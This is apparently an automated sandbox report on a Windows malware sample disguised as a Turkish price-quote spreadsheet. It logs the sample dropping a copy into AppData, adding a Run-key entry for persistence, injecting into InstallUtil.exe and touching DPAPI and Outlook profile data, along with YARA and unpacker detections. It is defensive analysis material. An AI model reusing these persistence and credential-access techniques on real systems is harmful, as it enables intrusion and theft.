                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeStatic file information: File size 2394624 > 1048576
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x247e00
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2063013281.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2043823101.0000000003557000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2164548814.0000000003714000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.0000000004594000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2251979049.0000000002A40000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2272906135.0000000003787000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2063013281.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2043823101.0000000003557000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2164548814.0000000003714000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.0000000004594000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2251979049.0000000002A40000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2272906135.0000000003787000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061637141.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061637141.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5b60000.11.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5b60000.11.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5b60000.11.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Yara detected Costura Assembly Loader
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5a40000.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.42b7e40.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.2251979049.0000000002799000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2062230360.0000000005A40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2164548814.0000000003391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2043823101.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 6544, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Tojeiuai.exe PID: 7104, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_03117A80 push eax; ret 0_2_03117A81
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05762EA7 push esp; retf 0_2_05762EA8
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05AD31F7 push ebp; iretd 0_2_05AD31F8
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05AD3234 push ss; iretd 0_2_05AD3237
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05E26906 push ecx; retf 0_2_05E2690C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01059C30 push esp; retf 0108h2_2_01059D55
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06449242 push es; ret 2_2_06449244
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06442DBE pushfd ; retf 2_2_06442DC1
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_01697A80 push eax; ret 3_2_01697A81
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_03342EA7 push esp; retf 3_2_03342EA8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B031F7 push ebp; iretd 3_2_05B031F8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05B03234 push ss; iretd 3_2_05B03237
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05CF509C push ebx; iretd 3_2_05CF50A0
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05CF5AA0 push esi; iretd 3_2_05CF5A82
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05E58D99 push esi; iretd 3_2_05E58D9B
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05E56906 push ecx; retf 3_2_05E5690C
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05E5482B pushfd ; iretd 3_2_05E5482D
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05E58F1D push ebp; iretd 3_2_05E58F1E
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05E53603 push cs; retf 3_2_05E53608
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00AB7A80 push eax; ret 6_2_00AB7A81
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051E31F7 push ebp; iretd 6_2_051E31F8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051E3234 push ss; iretd 6_2_051E3237
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_05426906 push ecx; retf 6_2_0542690C
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_05423603 push cs; retf 6_2_05423608
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5950000.9.raw.unpack, YJ5DVBUWyaCY9p7rMiM.csHigh entropy of concatenated method names: 'YCoUnTG5Ce', 'MdbdKSIY2Zu9X8qabhM', 'hpcdpCIG2cBy4CqShZi', 'YtyOUkI7TnMNNLPPPZr', 'AU5iJhIEMLVYXnygwMU', 'ThfD5KI8V3HWrUX2XtL', 'kg8TTRId7V6wx3LNmvB'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5950000.9.raw.unpack, tB3UD6BNcDYyQHMZ2UJ.csHigh entropy of concatenated method names: 'uXOB9MMTGq', 'kUlHitAsus3apG1eTTC', 'gAWfFDAHCsxr1lxkePy', 'xV6PrnAzvgiHuLEhNl7', 'OBG8VCNceSRUSgwlkdw', 'LSnIvfApucFWd3xXAiK', 'nkBFSgAJBNBmWgyQ75W'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5950000.9.raw.unpack, cXxcj0UMBEmO881Z1fw.csHigh entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'SlkU1Qp0aT', 'NtProtectVirtualMemory', 'sj5LYNIa6csAxKFXYJj', 'qihusRIPHOpNriWK1Kp', 'n6eFPoILKgI5Vp06TIq', 'XbBXXBIgLppRMSfBg20'
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeFile created: C:\Users\user\AppData\Roaming\Tojeiuai.exeJump to dropped file
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TojeiuaiJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TojeiuaiJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
